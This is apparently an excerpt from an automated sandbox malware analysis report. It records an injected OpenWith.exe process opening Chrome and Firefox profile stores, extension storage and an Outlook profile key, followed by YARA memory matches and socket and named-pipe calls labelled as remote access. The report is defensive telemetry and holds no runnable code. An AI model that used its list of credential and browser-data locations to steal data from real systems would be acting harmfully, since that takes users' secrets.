Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfba
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\startupCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\safebrowsing
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\thumbnails
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\f0479a66-61f1-42d6-a1ab-d023ed0adaa0
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs\browser
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs\browser\newtab
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\ff366d85-2475-4dfc-a5c6-01e0d6f59500
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 1880, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000002.00000003.2114030735.0000000002B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2110064787.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2241149327.0000000004570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2113793924.0000000003C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F04F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 3_2_00007DF41F04F83C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0814B8 socket,bind, 3_2_00007DF41F0814B8